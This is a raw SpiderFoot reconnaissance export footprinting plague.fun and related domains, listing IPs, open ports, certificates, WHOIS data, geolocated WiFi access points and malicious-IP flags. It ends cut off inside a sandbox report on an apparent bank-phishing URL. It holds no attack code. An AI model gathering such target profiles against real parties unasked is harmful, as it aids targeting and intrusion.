fc:8e:2c:32:32:50:12:1e:81:b8:2a:d7:c7:63:63:29:25:9d: df:b3:65:87:1a:15:13:5b:e4:c1:12:a9:c6:3e:65:5a:18:83: 7d:88:88:ec:8d:41:62:f3:f5:77:5e:7c:ab:2e:48:36:b7:b7: 13:e4:41:b3 plague.fun
2022-12-18 00:09:54 Hosting Provider No Hosting Provider Identifier 0 0 2 0 None Cloudflare Inc: https://www.cloudflare.com/ 188.114.96.1
2022-12-18 00:04:01 Physical Location No ipstack 0 0 2 0 None Colombia 188.114.96.1
2022-12-18 00:12:41 Raw Data from RIRs No ipapi.co 0 0 2 0 None {u'region_code': u'ON', u'country_tld': u'.ca', u'ip': u'172.67.169.215', u'currency_name': u'Dollar', u'currency': u'CAD', u'country_population': 37058856, u'country_code': u'CA', u'timezone': u'America/Toronto', u'city': u'Toronto', u'network': u'172.67.128.0/17', u'languages': u'en-CA,fr-CA,iu', u'version': u'IPv4', u'latitude': 43.6227, u'in_eu': False, u'utc_offset': u'-0500', u'continent_code': u'NA', u'country_name': u'Canada', u'country_capital': u'Ottawa', u'org': u'CLOUDFLARENET', u'postal': u'M5J', u'asn': u'AS13335', u'country': u'CA', u'region': u'Ontario', u'longitude': -79.3892, u'country_calling_code': u'+1', u'country_area': 9984670.0, u'country_code_iso3': u'CAN'} 172.67.169.215
2022-12-18 00:21:11 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None 55 2nd PMO (Net ID: 00:01:21:10:85:60) 37.780462,-122.390564
2022-12-18 00:08:25 SSL Certificate - Raw Data No Certificate Transparency 1 0 1 0 None Certificate: Data: Version: 3 (0x2) Serial Number: 41:cf:04:f8:c0:f2:7b:cd:70:73:3f:d3:40:5f:a0:ad Signature Algorithm: sha384WithRSAEncryption Issuer: C=AT, O=ZeroSSL, CN=ZeroSSL RSA Domain Secure Site CA Validity Not Before: Jun 20 00:00:00 2022 GMT Not After : Sep 18 23:59:59 2022 GMT Subject: CN=zerotwo-best-waifu.online Subject Public Key Info: Public Key Algorithm: rsaEncryption RSA Public-Key: (2048 bit) Modulus: 00:97:9f:f2:3b:4c:62:dd:0e:a0:54:9a:a0:10:cd: ac:59:0c:51:1f:9c:dc:da:36:55:a1:c5:dd:3e:e0: b8:05:89:90:60:39:6a:76:93:69:bc:6f:7d:89:ce: f3:16:25:e0:bb:64:27:32:fc:da:e6:56:30:d1:7e: 5b:3e:28:4d:f1:b0:a0:56:ee:0a:bc:a5:39:af:e6: 13:f5:d6:79:19:a8:12:72:09:bf:5e:64:84:12:63: cf:77:47:49:c9:12:10:fc:f7:ff:a6:1a:0d:f2:b1: 79:fd:59:41:1c:fa:7c:f0:a2:99:89:29:45:b4:3c: 6c:d7:f9:35:3d:b0:c7:85:55:53:9a:ad:7e:11:22: 60:ec:39:30:8f:a5:cf:b5:29:82:d4:26:f7:0d:05: b7:61:07:0f:a8:4a:bc:60:a5:e9:c1:c5:13:1d:a6: 64:a0:78:f9:0d:b3:11:5a:bc:74:aa:07:7d:be:d9: f2:82:44:6a:ff:00:bd:e0:9b:e6:be:35:1a:2a:77: c4:91:36:75:14:26:8c:bd:4f:8f:0b:10:fd:77:e1: 68:19:26:e2:67:71:60:17:2a:b3:f0:2d:94:68:b0: 19:4e:6e:c9:38:b4:f5:c9:51:42:82:38:5c:0a:25: 10:26:da:fe:41:d1:53:ce:63:9d:8d:0b:8f:db:2a: 9d:d9 Exponent: 65537 (0x10001) X509v3 extensions: X509v3 Authority Key Identifier: keyid:C8:D9:78:68:A2:D9:19:68:D5:3D:72:DE:5F:0A:3E:DC:B5:86:86:A6 X509v3 Subject Key Identifier: D5:ED:E6:A1:33:4E:CF:0F:7C:8A:16:5B:B4:C5:26:5E:D2:66:E3:B8 X509v3 Key Usage: critical Digital Signature, Key Encipherment X509v3 Basic Constraints: critical CA:FALSE X509v3 Extended Key Usage: TLS Web Server Authentication, TLS Web Client Authentication X509v3 Certificate Policies: Policy: 1.3.6.1.4.1.6449.1.2.2.78 CPS: https://sectigo.com/CPS Policy: 2.23.140.1.2.1 Authority Information Access: CA Issuers - URI:http://zerossl.crt.sectigo.com/ZeroSSLRSADomainSecureSiteCA.crt OCSP - URI:http://zerossl.ocsp.sectigo.com CT Precertificate Poison: critical NULL X509v3 Subject Alternative Name: DNS:zerotwo-best-waifu.online, DNS:www.zerotwo-best-waifu.online Signature Algorithm: sha384WithRSAEncryption 4e:e8:80:5f:56:bd:7f:d5:c9:aa:99:c0:9b:14:e5:da:dd:87: 43:6a:40:c4:de:06:c4:9c:24:b5:f5:67:55:c6:64:ed:f4:e0: 80:0b:b5:2f:f7:02:a1:41:fc:bf:0b:f7:4e:9b:20:9f:e7:54: fa:92:38:82:2f:00:56:12:1b:a4:5b:aa:ae:2f:aa:d7:cd:d0: df:ba:ba:a3:c3:1e:c8:90:de:d4:16:ff:1e:4e:b6:13:53:d2: 47:a5:5d:4a:16:c0:15:4d:ad:03:83:6e:26:7e:e3:96:95:64: 6a:c4:04:44:16:bf:a8:de:0c:9e:6f:3e:35:50:cc:04:48:a8: 40:08:06:7a:0c:ee:00:70:03:eb:a1:8d:30:c1:0e:57:9a:65: 9b:81:25:38:5a:96:51:de:af:bc:98:9f:fa:29:62:1c:9b:79: 84:b9:ef:b4:0f:30:af:23:93:3f:79:36:cc:37:10:d1:a6:97: 02:60:5e:ea:40:36:2d:97:7c:20:1d:c8:28:fb:f6:17:bc:3a: e7:b0:c6:00:08:29:05:df:ef:4a:58:87:62:11:49:15:81:c3: 0d:f5:22:e7:8b:2e:70:0d:39:52:46:4f:a9:9a:ed:c7:9f:57: f1:88:02:bf:3e:d2:ef:35:e6:c2:a8:f4:64:68:3c:3d:c4:22: 22:64:21:26:bb:dd:1c:78:9b:34:a4:0b:0a:7c:78:c0:4a:fe: 81:b6:59:6e:d8:9b:db:bf:f8:bb:98:28:a9:0d:30:dc:a3:00: fe:4b:c7:59:3d:d3:94:4a:39:3c:00:fe:7c:c8:2d:69:0d:47: 6c:5d:20:75:e6:9b:b2:11:94:70:13:ea:ee:9f:8f:dc:aa:25: 3c:43:c3:ad:c3:40:19:ef:a8:fb:4b:4e:73:4c:9a:7b:c5:a5: 09:33:df:42:95:71:29:98:eb:0d:e1:f2:88:58:76:3f:3f:cc: 6e:bb:1a:f8:c1:a2:05:c9:8d:0c:09:74:8b:cd:d2:24:d8:47: ea:61:a5:04:7e:45:83:3b:5b:c3:17:4a:74:26:a8:ed:b0:83: 48:dd:58:ac:47:c8:a5:2c:ab:ad:e4:d1:c8:ef:a1:ee:97:e8: a3:9e:cd:35:18:8b:2c:dd:43:89:b5:11:bd:83:50:fb:4d:32: 50:d4:70:24:a4:4a:05:87:1a:cb:63:7d:d6:b8:2f:0e:c8:cd: 9d:df:9d:c8:f7:f0:f7:50:5e:5f:4b:40:3c:16:09:0a:67:23: 9f:bf:d8:ac:ba:d0:16:f2:c6:2d:72:88:1a:c8:cb:cd:67:b8: 65:1e:82:a3:13:cf:83:95:d5:6e:5d:41:90:19:39:fa:f6:88: 1b:b0:5a:76:48:6f:57:59 zerotwo-best-waifu.online
2022-12-18 00:21:17 Open TCP Port Banner No Censys 0 0 2 0 None HTTP/1.1 403 Forbidden Date: Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Vary: Accept-Encoding Server: cloudflare CF-RAY: 77a7ca0aad962ca3-ORD Content-Encoding: gzip 188.114.96.1
2022-12-18 00:08:36 Physical Location No LeakIX 0 0 1 0 None Amsterdam, North Holland, Netherlands 137.117.157.128
2022-12-18 00:14:31 Physical Location No ipstack 0 0 2 0 None Colombia 188.114.97.3
2022-12-18 00:09:41 Co-Hosted Site No HackerTarget 0 0 2 0 None acversing.cf 172.67.147.230
2022-12-18 00:37:18 Similar Domain Yes TLD Searcher 1 0 1 0 None plague.xen.prgmr.com plague.fun
2022-12-18 00:21:02 Open TCP Port No Censys 0 0 2 0 None 104.21.28.240:2087 104.21.28.240
2022-12-18 00:21:09 HTTP Headers No Censys 0 0 2 0 None {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Cf_Ray": ["77aa8b4c1a15036c-ORD"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Date": [""], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} 188.114.96.0
2022-12-18 00:08:41 Open TCP Port No LeakIX 0 0 1 0 None 40.113.112.131:80 40.113.112.131
2022-12-18 00:21:13 HTTP Headers No Censys 0 0 2 0 None {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Date": [""], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Cf_Ray": ["77b30ae4babae178-ORD"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} 188.114.97.0
2022-12-18 00:21:11 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None RyanLG (Net ID: 00:01:36:4F:9A:F0) 37.780462,-122.390564
2022-12-18 00:39:59 Malicious IP Address Yes VirusTotal 0 0 3 0 None VirusTotal [188.114.96.8] https://www.virustotal.com/en/ip-address/188.114.96.8/information/ 188.114.96.0/24
2022-12-18 00:12:58 Malicious IP on Same Subnet Yes blocklist.de 0 0 2 0 None blocklist.de List [4.224.0.0/12] http://lists.blocklist.de/lists/all.txt 4.224.0.0/12
2022-12-18 00:06:07 Internet Name No DNS Resolver 0 0 2 0 None misogyny.wtf [{u'not_after': u'2022-12-19T21:18:05', u'not_before': u'2022-09-20T21:18:06', u'issuer_ca_id': 180753, u'name_value': u'*.misogyny.wtf\nmisogyny.wtf', u'issuer_name': u'C=US, O=Google Trust Services LLC, CN=GTS CA 1P5', u'common_name': u'*.misogyny.wtf', u'serial_number': u'00f4f0fa2fab28c37d0eb0025f9f06b10c', u'entry_timestamp': u'2022-09-20T22:18:07.22', u'id': 7584290631}, {u'not_after': u'2022-12-19T20:09:19', u'not_before': u'2022-09-20T20:09:20', u'issuer_ca_id': 183283, u'name_value': u'*.misogyny.wtf\nmisogyny.wtf', u'issuer_name': u"C=US, O=Let's Encrypt, CN=E1", u'common_name': u'*.misogyny.wtf', u'serial_number': u'043bc1da8c2d8d3c49c8fb3d44b5c287b43a', u'entry_timestamp': u'2022-09-20T21:09:20.772', u'id': 7588954405}, {u'not_after': u'2022-12-19T20:09:19', u'not_before': u'2022-09-20T20:09:20', u'issuer_ca_id': 183283, u'name_value': u'*.misogyny.wtf\nmisogyny.wtf', u'issuer_name': u"C=US, O=Let's Encrypt, CN=E1", u'common_name': u'*.misogyny.wtf', u'serial_number': u'043bc1da8c2d8d3c49c8fb3d44b5c287b43a', u'entry_timestamp': u'2022-09-20T21:09:20.442', u'id': 7584197572}, {u'not_after': u'2022-10-21T20:47:27', u'not_before': u'2022-07-23T20:47:28', u'issuer_ca_id': 183283, u'name_value': u'*.misogyny.wtf\nmisogyny.wtf', u'issuer_name': u"C=US, O=Let's Encrypt, CN=E1", u'common_name': u'*.misogyny.wtf', u'serial_number': u'04d69ed288e9c1897428652d6e8809509f4f', u'entry_timestamp': u'2022-07-23T21:47:29.495', u'id': 7186449707}, {u'not_after': u'2022-10-21T20:47:27', u'not_before': u'2022-07-23T20:47:28', u'issuer_ca_id': 183283, u'name_value': u'*.misogyny.wtf\nmisogyny.wtf', u'issuer_name': u"C=US, O=Let's Encrypt, CN=E1", u'common_name': u'*.misogyny.wtf', u'serial_number': u'04d69ed288e9c1897428652d6e8809509f4f', u'entry_timestamp': u'2022-07-23T21:47:28.726', u'id': 7185452708}, {u'not_after':
u'2022-10-21T20:45:09', u'not_before': u'2022-07-23T20:45:10', u'issuer_ca_id': 180753, u'name_value': u'*.misogyny.wtf\nmisogyny.wtf', u'issuer_name': u'C=US, O=Google Trust Services LLC, CN=GTS CA 1P5', u'common_name': u'*.misogyny.wtf', u'serial_number': u'392fd3a5c8f5abd1137069a51df6ba07', u'entry_timestamp': u'2022-07-23T21:45:11.265', u'id': 7185973399}] 2022-12-18 00:02:39 IP Address No SpiderFoot UI 14 0 0 0 None 137.117.157.128 plague.fun,misogyny.wtf,rasputain.fr,zerotwo-best-waifu.online,137.117.157.128,20.195.209.219,4.228.83.86,40.113.112.131,51.103.210.236,20.224.2.213 2022-12-18 00:09:37 Physical Location No LeakIX 0 0 2 0 None Amsterdam, North Holland, Netherlands 188.114.96.3 2022-12-18 00:38:37 Malicious IP Address Yes VirusTotal 0 0 3 0 None VirusTotal [188.114.96.3] https://www.virustotal.com/en/ip-address/188.114.96.3/information/ 188.114.96.0/24 2022-12-18 00:21:17 HTTP Headers No Censys 0 0 2 0 None {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Cf_Ray": ["77af34ce8a306332-ORD"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Date": [""], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} 188.114.96.1 2022-12-18 00:13:44 Affiliate - Email Address No E-Mail Address Extractor 0 0 5 0 None private@register.it Domain Name: WEBAPPS.NET Registry Domain ID: 98172701_DOMAIN_NET-VRSN Registrar WHOIS Server: whois.register.it Registrar URL: http://www.register.it Updated Date: 2022-05-22T07:28:29Z Creation Date: 2003-05-21T18:09:42Z Registry Expiry 
Date: 2023-05-21T18:09:42Z Registrar: Register SPA Registrar IANA ID: 168 Registrar Abuse Contact Email: abuse@register.it Registrar Abuse Contact Phone: +39.05520021555 Domain Status: ok https://icann.org/epp#ok Name Server: NS1.REGISTER.IT Name Server: NS2.REGISTER.IT DNSSEC: unsigned URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of whois database: 2022-12-18T00:10:42Z <<< For more information on Whois status codes, please visit https://icann.org/epp NOTICE: The expiration date displayed in this record is the date the registrar's sponsorship of the domain name registration in the registry is currently set to expire. This date does not necessarily reflect the expiration date of the domain name registrant's agreement with the sponsoring registrar. Users may consult the sponsoring registrar's Whois database to view the registrar's reported date of expiration for this registration. TERMS OF USE: You are not authorized to access or query our Whois database through the use of electronic processes that are high-volume and automated except as reasonably necessary to register domain names or modify existing registrations; the Data in VeriSign Global Registry Services' ("VeriSign") Whois database is provided by VeriSign for information purposes only, and to assist persons in obtaining information about or related to a domain name registration record. VeriSign does not guarantee its accuracy. By submitting a Whois query, you agree to abide by the following terms of use: You agree that you may use this Data only for lawful purposes and that under no circumstances will you use this Data to: (1) allow, enable, or otherwise support the transmission of mass unsolicited, commercial advertising or solicitations via e-mail, telephone, or facsimile; or (2) enable high volume, automated, electronic processes that apply to VeriSign (or its computer systems). 
The compilation, repackaging, dissemination or other use of this Data is expressly prohibited without the prior written consent of VeriSign. You agree not to use electronic processes that are automated and high-volume to access or query the Whois database except as reasonably necessary to register domain names or modify existing registrations. VeriSign reserves the right to restrict your access to the Whois database in its sole discretion to ensure operational stability. VeriSign may restrict or terminate your access to the Whois database for failure to abide by these terms of use. VeriSign reserves the right to modify these terms at any time. The Registry database contains ONLY .COM, .NET, .EDU domains and Registrars. Domain Name: WEBAPPS.NET Registry Domain ID: 98172701_DOMAIN_NET-VRSN Registrar WHOIS Server: whois.register.it Registrar URL: http://we.register.it Updated Date: 2022-06-23T00:00:00Z Creation Date: 2011-01-25T00:00:00Z Registrar Registration Expiration Date: 2023-05-21T00:00:00Z Registrar: REGISTER S.P.A. 
Registrar IANA ID: 168 Registrar Abuse Contact Email: abuse@register.it Registrar Abuse Contact Phone: +39.05520021555 Reseller: Domain Status: ok https://icann.org/epp#ok Registry Registrant ID: Registrant Name: Global Domain Privacy Registrant Organization: GLOBAL DOMAIN PRIVACY Registrant Street: Via Zanchi 22 Registrant City: Bergamo Registrant State/Province: BG Registrant Postal Code: 24126 Registrant Country: IT Registrant Phone: +39.353230400 Registrant Phone Ext: Registrant Fax: +39.353230312 Registrant Fax Ext: Registrant Email: z22lglbqyskvzwym@registerprivateregistration.com Registry Admin ID: Admin Name: Global Domain Privacy Admin Organization: GLOBAL DOMAIN PRIVACY Admin Street: Via Zanchi 22 Admin City: Bergamo Admin State/Province: BG Admin Postal Code: 24126 Admin Country: IT Admin Phone: +39.353230400 Admin Phone Ext: Admin Fax: +39.353230312 Admin Fax Ext: Admin Email: z22lglbqyskvzwym@registerprivateregistration.com Registry Tech ID: Tech Name: Global Domain Privacy Tech Organization: GLOBAL DOMAIN PRIVACY Tech Street: Via Zanchi 22 Tech City: Bergamo Tech State/Province: BG Tech Postal Code: 24126 Tech Country: IT Tech Phone: +39.353230400 Tech Phone Ext: Tech Fax: +39.353230312 Tech Fax Ext: Tech Email: private@register.it Name Server: NS1.REGISTER.IT Name Server: NS2.REGISTER.IT DNSSEC: unsigned URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/ >>> Last update of whois database: 2022-12-18T00:11:00Z <<< For more information on Whois status codes, please visit https://icann.org/epp 2022-12-18 00:21:10 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None logitec-a53131 (Net ID: 00:01:8E:A5:31:30) 37.7803446,-122.3906132 2022-12-18 00:21:13 Open TCP Port No Censys 0 0 2 0 None 188.114.97.0:8880 188.114.97.0 2022-12-18 00:21:10 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None SpaceStation (Net ID: 00:02:2D:01:CF:F8) 37.7803446,-122.3906132 2022-12-18 00:06:40 Open TCP Port No Pulsedive 0 0 2 0 None 
188.114.97.1:8080 188.114.97.1 2022-12-18 00:11:55 Physical Location No ipapi.co 1 0 1 0 None Campinas, Sao Paulo, SP, Brazil, BR 20.195.209.219 2022-12-18 00:06:51 Malicious IP Address Yes Internet Storm Center 0 1 1 0 None Internet Storm Center [20.195.209.219] https://isc.sans.edu/api/ip/20.195.209.219 20.195.209.219 2022-12-18 00:21:17 Open TCP Port No Censys 0 0 2 0 None 188.114.96.1:2083 188.114.96.1 2022-12-18 00:03:15 Affiliate - Internet Name No DNS Resolver 0 0 3 0 None lfbn-nic-1-332-101.w90-116.abo.wanadoo.fr 90.116.166.101 2022-12-18 00:12:08 Raw Data from RIRs No ipapi.co 0 0 2 0 None {u'region_code': u'ON', u'country_tld': u'.ca', u'ip': u'172.67.147.230', u'currency_name': u'Dollar', u'currency': u'CAD', u'country_population': 37058856, u'country_code': u'CA', u'timezone': u'America/Toronto', u'city': u'Toronto', u'network': u'172.67.128.0/17', u'languages': u'en-CA,fr-CA,iu', u'version': u'IPv4', u'latitude': 43.6227, u'in_eu': False, u'utc_offset': u'-0500', u'continent_code': u'NA', u'country_name': u'Canada', u'country_capital': u'Ottawa', u'org': u'CLOUDFLARENET', u'postal': u'M5J', u'asn': u'AS13335', u'country': u'CA', u'region': u'Ontario', u'longitude': -79.3892, u'country_calling_code': u'+1', u'country_area': 9984670.0, u'country_code_iso3': u'CAN'} 172.67.147.230 2022-12-18 00:23:11 Raw Data from RIRs No CRXcavator 0 0 1 0 None [{"platform": "Chrome", "version": "4.0.2", "data": {"risk": {"total": 7, "webstore": {"website": 1, "privacy_policy": 1, "users": 1, "email": 1, "address": 1, "total": 7, "support_site": 1, "rating_users": 1}, "metadata": {}}, "webstore": {"website": "", "rating": 0, "privacy_policy": "", "last_updated": "", "name": "", "price": "", "offered_by": "", "support_site": "", "version": "", "address": "", "short_description": "", "permission_warnings": null, "users": 0, "size": "", "type": "", "email": "", "rating_users": 0, "icon": ""}}, "extension_id": "efiefgpfndecmbeappadjclmkiahmejg"}] plague.fun 2022-12-18 
00:12:33 Raw Data from RIRs No ipapi.co 0 0 2 0 None {u'region_code': u'ENG', u'country_tld': u'.uk', u'ip': u'2a06:98c1:3120::1', u'currency_name': u'Pound', u'currency': u'GBP', u'country_population': 66488991, u'country_code': u'GB', u'timezone': u'Europe/London', u'city': u'London', u'network': u'2a06:98c1::/32', u'languages': u'en-GB,cy-GB,gd', u'version': u'IPv6', u'latitude': 51.5638, u'in_eu': False, u'utc_offset': u'+0000', u'continent_code': u'EU', u'country_name': u'United Kingdom', u'country_capital': u'London', u'org': u'CLOUDFLARENET', u'postal': u'N16', u'asn': u'AS13335', u'country': u'GB', u'region': u'England', u'longitude': -0.0765, u'country_calling_code': u'+44', u'country_area': 244820.0, u'country_code_iso3': u'GBR'} 2a06:98c1:3120::1 2022-12-18 00:06:02 Raw Data from RIRs No Hybrid Analysis 0 0 2 0 None [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': None, u'total_processes': 3, u'threat_score': 35, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://portalpersonasparatodo.tdavivienda.repl.co/', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"34.149.204.188:443"\n "142.250.188.234:443"\n "142.250.68.99:443"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_c04_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "Local\\ZonesCacheCounterMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_c04_IESQMMUTEX_0_519"\n 
"Local\\VERMGMTBlockListFileMutex"\n "IsoScope_c04_IESQMMUTEX_0_331"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_c04_IESQMMUTEX_0_303"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_c04_ConnHashTable<3076>_HashTable_Mutex"\n "UpdatingNewTabPageData"\n "IsoScope_c04_IE_EarlyTabStart_0xb8c_Mutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3076"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3076"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"portalpersonasparatodo.tdavivienda.repl.co"'}, {u'category': u'General', u'origin': u'String', u'identifier': u'string-127', u'name': u'Found user-agent related strings', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/001', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.001', u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'"GET / HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like 
Gecko\nAccept-Encoding: gzip, deflate\nHost: portalpersonasparatodo.tdavivienda.repl.co\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET / HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: portalpersonasparatodo.tdavivienda.repl.co\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /css?family=IBM+Plex+Sans HTTP/1.1\nAccept: text/css, */*\nReferer: https://portalpersonasparatodo.tdavivienda.repl.co/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: fonts.googleapis.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /css?family=IBM+Plex+Sans HTTP/1.1\nAccept: text/css, */*\nReferer: https://portalpersonasparatodo.tdavivienda.repl.co/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: fonts.googleapis.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /s/ibmplexsans/v14/zYXgKVElMYYaJe8bpLHnCwDKhdHeEw.woff HTTP/1.1\nAccept: */*\nReferer: https://portalpersonasparatodo.tdavivienda.repl.co/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nOrigin: https://portalpersonasparatodo.tdavivienda.repl.co\nAccept-Encoding: gzip, deflate\nHost: fonts.gstatic.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /s/ibmplexsans/v14/zYXgKVElMYYaJe8bpLHnCwDKhdHeEw.woff HTTP/1.1\nAccept: */*\nReferer: https://portalpersonasparatodo.tdavivienda.repl.co/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nOrigin: https://portalpersonasparatodo.tdavivienda.repl.co\nAccept-Encoding: gzip, deflate\nHost: fonts.gstatic.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: 
")\n "GET /s/ibmplexsans/v14/zYXgKVElMYYaJe8bpLHnCwDKhdHeEw.woff HTTP/1.1\nAccept: */*\nReferer: https://portalpersonasparatodo.tdavivienda.repl.co/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nOrigin: https://portalpersonasparatodo.tdavivienda.repl.co\nAccept-Encoding: gzip, deflate\nHost: fonts.gstatic.com\nIf-Modified-Since: Tue, 26 Apr 2022 15:46:53 GMT\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /s/ibmplexsans/v14/zYXgKVElMYYaJe8bpLHnCwDKhdHeEw.woff HTTP/1.1\nAccept: */*\nReferer: https://portalpersonasparatodo.tdavivienda.repl.co/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nOrigin: https://portalpersonasparatodo.tdavivienda.repl.co\nAccept-Encoding: gzip, deflate\nHost: fonts.gstatic.com\nIf-Modified-Since: Tue, 26 Apr 2022 15:46:53 GMT\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-37', u'name': u'Drops files inside appdata directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'Dropped file: "HOMR1HKK.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\HOMR1HKK.txt]- [targetUID: 00000000-00003076]\n Dropped file: "70BYFHVI.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\70BYFHVI.txt]- [targetUID: 00000000-00003076]\n Dropped file: "0P8ZVUES.txt" - Location: 